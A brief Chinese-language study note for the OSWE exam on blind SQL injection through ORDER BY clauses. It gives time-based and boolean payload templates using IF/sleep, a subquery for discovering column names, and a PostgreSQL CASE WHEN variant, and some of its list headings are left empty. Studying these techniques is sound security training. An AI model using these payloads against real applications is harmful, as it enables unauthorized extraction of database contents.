盲注

盲注是oswe当中经常考察的部分

一般盲注从类型上可分为

从盲注的位置上可以分为

本质上都是因为输入的参数和sql语句进行拼接造成了影响sql逻辑处理的语句造成的

都是基于返回的内容的展示排序的不同而说明不同

基于order by的时间盲注

select * from ha order by if(1=1,1,sleep(1))

如果出现错误的话就会sleep

基于order by的布尔盲注

select * from ha order by if(1=1,id,username)

如果是表达式满足条件即为id列进行排序，不满足则为username

select * from ha order by if(1=1,1,(select id from i_s.tables))

不知道列名的情况下，通过这种方法查询列名

在postgre当中 if的语法有一些变化

select case when condition then result1 else result2::text END

的语法进行查询

select * from ha order by  case when (select 1=1) then 1 else 0::text

进行展示